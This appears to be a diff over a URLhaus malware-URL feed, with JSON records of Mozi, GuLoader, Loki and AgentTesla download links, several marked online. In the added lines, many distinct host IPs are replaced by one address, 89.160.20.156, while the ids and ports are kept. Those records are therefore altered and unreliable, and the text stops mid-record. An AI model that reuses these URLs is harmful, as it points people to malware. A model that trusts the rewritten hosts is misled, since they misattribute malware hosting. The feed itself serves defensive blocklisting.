-{"id":"960949","urlhaus_reference":"https://urlhaus.abuse.ch/url/960949/","url":"http://200.52.228.27:44751/bin.sh","url_status":"offline","host":"200.52.228.27","date_added":"2021-01-14 16:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} -{"id":"960950","urlhaus_reference":"https://urlhaus.abuse.ch/url/960950/","url":"http://115.63.203.134:47719/Mozi.m","url_status":"online","host":"115.63.203.134","date_added":"2021-01-14 16:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960945","urlhaus_reference":"https://urlhaus.abuse.ch/url/960945/","url":"http://181.194.120.182:38133/Mozi.m","url_status":"offline","host":"181.194.120.182","date_added":"2021-01-14 15:59:12 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"07ac0n","larted":"true","tags":["elf","Mozi"]} +{"id":"960947","urlhaus_reference":"https://urlhaus.abuse.ch/url/960947/","url":"http://89.160.20.156:49988/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"960948","urlhaus_reference":"https://urlhaus.abuse.ch/url/960948/","url":"http://89.160.20.156:42857/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960949","urlhaus_reference":"https://urlhaus.abuse.ch/url/960949/","url":"http://89.160.20.156:44751/bin.sh","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"960950","urlhaus_reference":"https://urlhaus.abuse.ch/url/960950/","url":"http://89.160.20.156:47719/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960945","urlhaus_reference":"https://urlhaus.abuse.ch/url/960945/","url":"http://89.160.20.156:38133/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:59:12 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"07ac0n","larted":"true","tags":["elf","Mozi"]} {"id":"960944","urlhaus_reference":"https://urlhaus.abuse.ch/url/960944/","url":"http://www.sowetoson.com/new/Host_yjwloaz52.bin","url_status":"online","host":"www.sowetoson.com","date_added":"2021-01-14 15:57:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"abused_legit_malware","surbl":"not listed"},"reporter":"abuse_ch","larted":"true","tags":["encrypted","GuLoader"]} {"id":"960942","urlhaus_reference":"https://urlhaus.abuse.ch/url/960942/","url":"https://www.agamagroup.com.ng/zxc/janomo_uGdNtpvRY170.bin","url_status":"online","host":"www.agamagroup.com.ng","date_added":"2021-01-14 15:57:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"abused_legit_malware","surbl":"not listed"},"reporter":"abuse_ch","larted":"true","tags":["encrypted","GuLoader"]} {"id":"960943","urlhaus_reference":"https://urlhaus.abuse.ch/url/960943/","url":"https://onedrive.live.com/download?cid=8FE9EB3F9398B325&resid=8FE9EB3F9398B325%21126&authkey=AOzL9FiDhEYRkm8","url_status":"online","host":"onedrive.live.com","date_added":"2021-01-14 15:57:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"abuse_ch","larted":"true","tags":["encrypted","GuLoader"]} -{"id":"960941","urlhaus_reference":"https://urlhaus.abuse.ch/url/960941/","url":"http://59.93.22.84:46462/Mozi.m","url_status":"offline","host":"59.93.22.84","date_added":"2021-01-14 15:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960940","urlhaus_reference":"https://urlhaus.abuse.ch/url/960940/","url":"http://59.95.173.7:39046/Mozi.m","url_status":"offline","host":"59.95.173.7","date_added":"2021-01-14 15:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960934","urlhaus_reference":"https://urlhaus.abuse.ch/url/960934/","url":"http://42.224.66.103:47418/Mozi.m","url_status":"online","host":"42.224.66.103","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960935","urlhaus_reference":"https://urlhaus.abuse.ch/url/960935/","url":"http://42.228.37.137:42287/Mozi.m","url_status":"online","host":"42.228.37.137","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960936","urlhaus_reference":"https://urlhaus.abuse.ch/url/960936/","url":"http://59.99.41.229:49596/Mozi.m","url_status":"offline","host":"59.99.41.229","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960937","urlhaus_reference":"https://urlhaus.abuse.ch/url/960937/","url":"http://42.229.232.193:39815/Mozi.m","url_status":"online","host":"42.229.232.193","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960938","urlhaus_reference":"https://urlhaus.abuse.ch/url/960938/","url":"http://61.53.104.80:36568/Mozi.m","url_status":"online","host":"61.53.104.80","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960939","urlhaus_reference":"https://urlhaus.abuse.ch/url/960939/","url":"http://222.141.45.45:32954/Mozi.m","url_status":"online","host":"222.141.45.45","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960933","urlhaus_reference":"https://urlhaus.abuse.ch/url/960933/","url":"http://211.195.3.122:57752/Mozi.m","url_status":"online","host":"211.195.3.122","date_added":"2021-01-14 15:51:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960932","urlhaus_reference":"https://urlhaus.abuse.ch/url/960932/","url":"http://186.33.123.115:52221/Mozi.m","url_status":"online","host":"186.33.123.115","date_added":"2021-01-14 15:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960931","urlhaus_reference":"https://urlhaus.abuse.ch/url/960931/","url":"http://125.44.251.66:58493/Mozi.m","url_status":"online","host":"125.44.251.66","date_added":"2021-01-14 15:50:40 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960930","urlhaus_reference":"https://urlhaus.abuse.ch/url/960930/","url":"http://117.222.174.88:57603/Mozi.m","url_status":"offline","host":"117.222.174.88","date_added":"2021-01-14 15:50:14 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960929","urlhaus_reference":"https://urlhaus.abuse.ch/url/960929/","url":"http://117.202.70.238:45439/Mozi.m","url_status":"offline","host":"117.202.70.238","date_added":"2021-01-14 15:50:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960928","urlhaus_reference":"https://urlhaus.abuse.ch/url/960928/","url":"http://117.222.163.220:58291/Mozi.m","url_status":"offline","host":"117.222.163.220","date_added":"2021-01-14 15:50:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960927","urlhaus_reference":"https://urlhaus.abuse.ch/url/960927/","url":"http://117.251.18.157:52785/Mozi.m","url_status":"online","host":"117.251.18.157","date_added":"2021-01-14 15:50:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960924","urlhaus_reference":"https://urlhaus.abuse.ch/url/960924/","url":"http://123.9.198.150:38582/Mozi.m","url_status":"online","host":"123.9.198.150","date_added":"2021-01-14 15:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960925","urlhaus_reference":"https://urlhaus.abuse.ch/url/960925/","url":"http://125.46.164.249:39503/Mozi.m","url_status":"online","host":"125.46.164.249","date_added":"2021-01-14 15:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960926","urlhaus_reference":"https://urlhaus.abuse.ch/url/960926/","url":"http://123.14.32.234:53018/Mozi.m","url_status":"online","host":"123.14.32.234","date_added":"2021-01-14 15:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960923","urlhaus_reference":"https://urlhaus.abuse.ch/url/960923/","url":"http://123.5.7.214:40698/Mozi.m","url_status":"online","host":"123.5.7.214","date_added":"2021-01-14 15:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960922","urlhaus_reference":"https://urlhaus.abuse.ch/url/960922/","url":"http://116.24.57.201:50060/Mozi.m","url_status":"online","host":"116.24.57.201","date_added":"2021-01-14 15:49:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960921","urlhaus_reference":"https://urlhaus.abuse.ch/url/960921/","url":"http://115.48.21.16:47874/Mozi.m","url_status":"online","host":"115.48.21.16","date_added":"2021-01-14 15:49:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960941","urlhaus_reference":"https://urlhaus.abuse.ch/url/960941/","url":"http://89.160.20.156:46462/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960940","urlhaus_reference":"https://urlhaus.abuse.ch/url/960940/","url":"http://89.160.20.156:39046/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960934","urlhaus_reference":"https://urlhaus.abuse.ch/url/960934/","url":"http://89.160.20.156:47418/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960935","urlhaus_reference":"https://urlhaus.abuse.ch/url/960935/","url":"http://89.160.20.156:42287/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960936","urlhaus_reference":"https://urlhaus.abuse.ch/url/960936/","url":"http://89.160.20.156:49596/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960937","urlhaus_reference":"https://urlhaus.abuse.ch/url/960937/","url":"http://89.160.20.156:39815/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960938","urlhaus_reference":"https://urlhaus.abuse.ch/url/960938/","url":"http://89.160.20.156:36568/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960939","urlhaus_reference":"https://urlhaus.abuse.ch/url/960939/","url":"http://89.160.20.156:32954/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960933","urlhaus_reference":"https://urlhaus.abuse.ch/url/960933/","url":"http://89.160.20.156:57752/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:51:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960932","urlhaus_reference":"https://urlhaus.abuse.ch/url/960932/","url":"http://89.160.20.156:52221/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960931","urlhaus_reference":"https://urlhaus.abuse.ch/url/960931/","url":"http://89.160.20.156:58493/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:50:40 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960930","urlhaus_reference":"https://urlhaus.abuse.ch/url/960930/","url":"http://89.160.20.156:57603/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:50:14 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960929","urlhaus_reference":"https://urlhaus.abuse.ch/url/960929/","url":"http://89.160.20.156:45439/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:50:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960928","urlhaus_reference":"https://urlhaus.abuse.ch/url/960928/","url":"http://89.160.20.156:58291/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:50:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960927","urlhaus_reference":"https://urlhaus.abuse.ch/url/960927/","url":"http://89.160.20.156:52785/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:50:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960924","urlhaus_reference":"https://urlhaus.abuse.ch/url/960924/","url":"http://89.160.20.156:38582/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960925","urlhaus_reference":"https://urlhaus.abuse.ch/url/960925/","url":"http://89.160.20.156:39503/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960926","urlhaus_reference":"https://urlhaus.abuse.ch/url/960926/","url":"http://89.160.20.156:53018/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960923","urlhaus_reference":"https://urlhaus.abuse.ch/url/960923/","url":"http://89.160.20.156:40698/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960922","urlhaus_reference":"https://urlhaus.abuse.ch/url/960922/","url":"http://89.160.20.156:50060/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:49:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960921","urlhaus_reference":"https://urlhaus.abuse.ch/url/960921/","url":"http://89.160.20.156:47874/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:49:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} {"id":"960919","urlhaus_reference":"https://urlhaus.abuse.ch/url/960919/","url":"http://perezluzwsdycafeyzmn.dns.navy/perdoc/regasm.exe","url_status":"online","host":"perezluzwsdycafeyzmn.dns.navy","date_added":"2021-01-14 15:46:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"listed"},"reporter":"abuse_ch","larted":"true","tags":["exe","Loki","opendir"]} -{"id":"960920","urlhaus_reference":"https://urlhaus.abuse.ch/url/960920/","url":"http://59.58.148.90:33799/bin.sh","url_status":"online","host":"59.58.148.90","date_added":"2021-01-14 15:46:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"960920","urlhaus_reference":"https://urlhaus.abuse.ch/url/960920/","url":"http://89.160.20.156:33799/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:46:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} {"id":"960918","urlhaus_reference":"https://urlhaus.abuse.ch/url/960918/","url":"http://kalamikwsdyonlinedws.dns.navy/kaladoc/vbc.exe","url_status":"online","host":"kalamikwsdyonlinedws.dns.navy","date_added":"2021-01-14 15:45:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"listed"},"reporter":"abuse_ch","larted":"true","tags":["AgentTesla","exe"]} -{"id":"960917","urlhaus_reference":"https://urlhaus.abuse.ch/url/960917/","url":"http://54.224.10.186/js/js/lokkk.jpg","url_status":"online","host":"54.224.10.186","date_added":"2021-01-14 15:45:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"abuse_ch","larted":"true","tags":["exe","Loki"]} -{"id":"960916","urlhaus_reference":"https://urlhaus.abuse.ch/url/960916/","url":"http://59.99.141.110:33201/Mozi.a","url_status":"offline","host":"59.99.141.110","date_added":"2021-01-14 15:38:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960914","urlhaus_reference":"https://urlhaus.abuse.ch/url/960914/","url":"http://59.99.136.138:53926/Mozi.m","url_status":"offline","host":"59.99.136.138","date_added":"2021-01-14 15:38:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960915","urlhaus_reference":"https://urlhaus.abuse.ch/url/960915/","url":"http://61.245.159.55:43917/Mozi.m","url_status":"online","host":"61.245.159.55","date_added":"2021-01-14 15:38:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960911","urlhaus_reference":"https://urlhaus.abuse.ch/url/960911/","url":"http://59.99.43.122:42053/Mozi.m","url_status":"offline","host":"59.99.43.122","date_added":"2021-01-14 15:38:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960912","urlhaus_reference":"https://urlhaus.abuse.ch/url/960912/","url":"http://49.68.21.201:57875/Mozi.m","url_status":"online","host":"49.68.21.201","date_added":"2021-01-14 15:38:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960913","urlhaus_reference":"https://urlhaus.abuse.ch/url/960913/","url":"http://59.96.26.38:35523/Mozi.m","url_status":"offline","host":"59.96.26.38","date_added":"2021-01-14 15:38:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960910","urlhaus_reference":"https://urlhaus.abuse.ch/url/960910/","url":"http://42.224.66.103:47418/i","url_status":"online","host":"42.224.66.103","date_added":"2021-01-14 15:38:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"960908","urlhaus_reference":"https://urlhaus.abuse.ch/url/960908/","url":"http://27.41.206.240:53007/Mozi.m","url_status":"offline","host":"27.41.206.240","date_added":"2021-01-14 15:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960909","urlhaus_reference":"https://urlhaus.abuse.ch/url/960909/","url":"http://42.230.133.2:38089/Mozi.m","url_status":"offline","host":"42.230.133.2","date_added":"2021-01-14 15:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960904","urlhaus_reference":"https://urlhaus.abuse.ch/url/960904/","url":"http://42.230.178.221:35243/Mozi.m","url_status":"online","host":"42.230.178.221","date_added":"2021-01-14 15:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960905","urlhaus_reference":"https://urlhaus.abuse.ch/url/960905/","url":"http://42.224.249.12:50589/Mozi.m","url_status":"online","host":"42.224.249.12","date_added":"2021-01-14 15:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960906","urlhaus_reference":"https://urlhaus.abuse.ch/url/960906/","url":"http://221.200.70.79:42479/Mozi.m","url_status":"online","host":"221.200.70.79","date_added":"2021-01-14 15:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960907","urlhaus_reference":"https://urlhaus.abuse.ch/url/960907/","url":"http://42.224.168.94:43425/Mozi.m","url_status":"online","host":"42.224.168.94","date_added":"2021-01-14 15:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960903","urlhaus_reference":"https://urlhaus.abuse.ch/url/960903/","url":"http://163.125.207.35:35013/Mozi.a","url_status":"online","host":"163.125.207.35","date_added":"2021-01-14 15:36:28 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960902","urlhaus_reference":"https://urlhaus.abuse.ch/url/960902/","url":"http://125.44.244.43:35298/Mozi.m","url_status":"online","host":"125.44.244.43","date_added":"2021-01-14 15:35:11 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960900","urlhaus_reference":"https://urlhaus.abuse.ch/url/960900/","url":"http://116.73.8.210:54174/Mozi.m","url_status":"online","host":"116.73.8.210","date_added":"2021-01-14 15:35:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960901","urlhaus_reference":"https://urlhaus.abuse.ch/url/960901/","url":"http://121.61.104.66:42768/Mozi.a","url_status":"online","host":"121.61.104.66","date_added":"2021-01-14 15:35:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960898","urlhaus_reference":"https://urlhaus.abuse.ch/url/960898/","url":"http://117.247.206.115:59110/Mozi.a","url_status":"offline","host":"117.247.206.115","date_added":"2021-01-14 15:35:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960899","urlhaus_reference":"https://urlhaus.abuse.ch/url/960899/","url":"http://119.198.43.18:51476/Mozi.m","url_status":"online","host":"119.198.43.18","date_added":"2021-01-14 15:35:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960897","urlhaus_reference":"https://urlhaus.abuse.ch/url/960897/","url":"http://182.124.94.169:58839/Mozi.m","url_status":"online","host":"182.124.94.169","date_added":"2021-01-14 15:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960894","urlhaus_reference":"https://urlhaus.abuse.ch/url/960894/","url":"http://125.46.166.16:50249/Mozi.m","url_status":"online","host":"125.46.166.16","date_added":"2021-01-14 15:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960895","urlhaus_reference":"https://urlhaus.abuse.ch/url/960895/","url":"http://123.4.250.147:46173/Mozi.m","url_status":"online","host":"123.4.250.147","date_added":"2021-01-14 15:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960896","urlhaus_reference":"https://urlhaus.abuse.ch/url/960896/","url":"http://182.124.57.87:43785/Mozi.m","url_status":"online","host":"182.124.57.87","date_added":"2021-01-14 15:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960893","urlhaus_reference":"https://urlhaus.abuse.ch/url/960893/","url":"http://113.92.159.37:46924/Mozi.m","url_status":"online","host":"113.92.159.37","date_added":"2021-01-14 15:34:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960892","urlhaus_reference":"https://urlhaus.abuse.ch/url/960892/","url":"http://113.195.165.157:59734/Mozi.m","url_status":"online","host":"113.195.165.157","date_added":"2021-01-14 15:34:05 